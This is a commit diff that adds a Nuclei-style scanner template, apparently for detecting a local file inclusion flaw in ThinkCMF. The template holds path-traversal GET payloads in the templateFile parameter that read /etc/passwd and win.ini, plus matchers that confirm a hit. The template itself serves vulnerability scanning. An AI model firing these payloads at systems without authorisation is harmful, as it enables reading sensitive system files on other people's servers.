commit
fbe3433a83
|
@ -0,0 +1,27 @@
|
||||||
|
id: thinkcmf-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ThinkCMF LFI
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: https://www.freebuf.com/vuls/217586.html
|
||||||
|
tags: thinkcmf,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?a=display&templateFile=README.md"
|
||||||
|
- "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd"
|
||||||
|
- "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "ThinkCMF"
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
- "[extensions]"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue